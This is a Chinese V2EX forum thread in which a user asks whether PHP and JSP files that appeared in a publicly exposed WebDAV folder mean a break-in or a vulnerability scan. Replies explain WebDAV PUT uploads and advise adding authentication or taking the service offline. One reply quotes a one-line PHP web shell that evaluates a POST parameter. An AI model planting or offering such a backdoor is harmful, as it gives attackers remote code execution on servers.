[求助] 有无安全大佬,电脑突然出现奇怪的文件,里面显示一些 CVE-XXX 的信息,不知道是黑客入侵还是被扫洞程序扫到了

354 天前
 movq

我是使用了一个 webdav 程序,把我电脑 A 的某个文件夹 F 暴露挂载成了 webdav ,然后使用 http 方式,在另一台电脑 B 通过公网 IP 来访问

昨天 F 文件夹里面里面突然出现下列文件夹:

打开之后,里面没发现有什么恶意程序,但是有很多网页,jsp 或者 php ,用文本编辑器打开里面就显示 CVExxx

里面有个文件叫 nuclei.html.gif ,我去 github 搜索,发现是一个 projectdiscovery 的 repo 里面的代码

https://github.com/projectdiscovery/nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Nuclei is a fast, efficient, and extensible vulnerability scanner. It can scan thousands of hosts in just a few minutes. The nuclei engine uses text-file templates to define the steps required to detect a vulnerability.

目前的怀疑:

  1. 某些扫洞程序扫到我的 webdav 了(但问题是 1 、他们是怎么做到在我的 webdav 文件夹添加文件的呢? 2 、在我的 webdav 文件夹放下这些文件的意义是什么呢)
  2. 有黑客入侵了电脑,但问题是我也没发现有什么勒索软件或者文件丢失啊?

我的疑问:

  1. 如何确定自己的电脑有没有被入侵?
  2. 如果是被扫洞程序扫到了,这意味着是别人提醒我有漏洞,还是意味着什么呢?
  3. 大家觉得发生了什么?
2390 次点击
所在节点    程序员
21 条回复
INTEL2333
354 天前
https://avd.aliyun.com/detail?id=AVD-2022-25487
unknowsll
354 天前
你放公网的东西被扫到了,加一下验证吧,上面有一条最简单的 php 小马,如果成了,后续会有大马继续进来,请尽快处理此服务,或者限制来源 IP
<?php eval(@$_POST['a']); ?>
unknowsll
354 天前
MD5 注入可以了解一下。
movq
354 天前
我再继续放点文件内容截图

![D8hRcvuqgaT5tlw]( https://s2.loli.net/2023/05/10/D8hRcvuqgaT5tlw.png)

![2bDzTfyLntxmahI]( https://s2.loli.net/2023/05/10/2bDzTfyLntxmahI.png)

![UPLVY9gbmT5Mifv]( https://s2.loli.net/2023/05/10/UPLVY9gbmT5Mifv.png)
billlee
354 天前
你的 webdav 被扫到并且被破解了密码(或者你根本没设置密码),然后那个人上传了一个 php 后门。当然如果你这个 webdav 服务是纯粹的 webdav, 不包含 php 解释器,那这个后门是无法运行的。
movq
354 天前
@billlee 我是 mac 直接使用 appstore 下载的一个 app ,这个 app 提供了 webdav 功能。不太知道这个 app 本身有没有 php 解释器
dode
354 天前
这可能类似善良黑客给你提示,管理员需要尽快处理
jackyzy823
354 天前
被扫描了,Webdav PUT 方法不就会创建文件么…
SunsetShimmer
354 天前
被上传 PHP 后门,如果没有 PHP 环境,没用。

但不管怎么说把存储公开到公网都不太好...
movq
354 天前
@SunsetShimmer 意思是如果没有程序主动执行我 webdav 里面的 php 文件就没事吗?
movq
354 天前
@billlee
@SunsetShimmer 我不太懂 php ,但是我知道 tomcat 里面是直接上传文件到 webapp 就会被自动运行。你们的意思是如果 php 文件被自动上传到某个目录,也会和 tomcat 运行 java web 程序一样被自动运行,这个意思吗?

但我这里面这些 php 文件都是在我的 webdav 根目录。我 webdav 只用于存储文件,没有配置什么服务,应该就没问题了吧?
billlee
354 天前
是的,要有程序去执行它。php 和 jsp 是 apache/tomcat 在收到 web 请求的时候会自动执行 web 目录下的对应脚本。如果是纯粹的 http 静态文件服务器,那是无法执行的。专门的 webdav app 大概率是没有 php 解释器的。
patrickyoung
354 天前
@movq #11 依然有问题,如果服务器在国内的或者被用来在国内的人身上的话,你想想攻击者在你这传个菠菜 /黄赌毒然后引用一下这个资源,你会怎么样?
darknoll
353 天前
你 webdav 没有设置密码?
xiaopigfly
353 天前
先赶紧把公网停掉,再排查是否解析 php 文件。如果解析大概率被入侵了。
movq
353 天前
@darknoll 有密码, 但网上查了下有的 webdav 攻击方式不需要密码
yumusb
353 天前
可以直接 尝试 PUT 文件到你的服务器,看看是否能够成功上传。
cquan
353 天前
CVE+数字是漏洞编号,你这个项目有漏洞,它应该是用软件批量扫描的,赶紧修复吧
movq
353 天前
@yumusb 感觉是 webdav 的 app 内部有漏洞,这些漏洞可以直接免密码上传文件进行攻击
movq
353 天前
@cquan 就是不知道是黑客来攻击我的电脑,还是有白帽子专门扫洞提醒别人,感觉很奇怪。我看了下文件夹,没有被修改过(因为 last modified time 都比这些扫洞文件的创建时间早)

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/938999

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX